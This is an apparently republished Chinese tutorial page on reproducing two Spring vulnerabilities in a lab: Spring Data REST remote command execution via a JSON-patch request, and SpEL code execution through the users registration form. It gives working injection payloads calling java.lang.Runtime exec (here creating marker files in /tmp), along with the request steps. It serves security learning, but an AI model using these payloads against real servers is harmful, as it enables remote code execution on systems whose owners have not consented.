当前位置: 首页 > article >正文

常见框架漏洞—Spring

article 2025/4/2 4:07:38

 一.Spring Data Rest 远程命令执⾏命令

1.搭建环境

2.访问网站下的/customers/1

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]

4.发现容器目录中有了succese

二.Spring代码执行

 1.环境搭建

2.访问网站下的users目录

3.提交页面进行抓包,添加poc:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=

4.查看终端,发现成功写入


http://www.kler.cn/a/599951.html

相关文章:

  • 深度学习篇---PaddleDetectionPaddleOCR
  • 《AI大模型趣味实战 》第7集:多端适配 个人新闻头条 基于大模型和RSS聚合打造个人新闻电台(Flask WEB版) 1
  • Spring Boot - 动态编译 Java 类并实现热加载
  • 自动驾驶背后的数学:ReLU,Sigmoid, Leaky ReLU, PReLU,Swish等激活函数解析
  • 深度强化学习中的深度神经网络优化策略:挑战与解决方案
  • Spring Boot 一个接口实现任意表的 Excel 导入导出
  • Unity图形学Shader快速回顾
  • 如何从后端实现页面跳转?
  • 【区块链通用服务平台及组件】绿信链 | FISCO BCOS 应用案例
  • Python(4)Python函数编程性能优化全指南:从基础语法到并发调优
  • 数据结构---最小生成树
  • 3.23学习总结
  • C#基础学习(四)笑谈C#函数:从“Hello World”到“千变万化”的奇幻之旅
  • Delta Lake 解析:架构、数据处理流程与最佳实践
  • Flink 自定义数据源:从理论到实践的全方位指南
  • 【C++】继承机制:从基础到避坑详细解说
  • Leetcode 3493. Properties Graph
  • Vue 表单输入绑定,双向绑定
  • 蓝桥杯2022年第十三届决赛真题-最大数字
  • STC89C52单片机学习——第35节: [16-1] AD/DA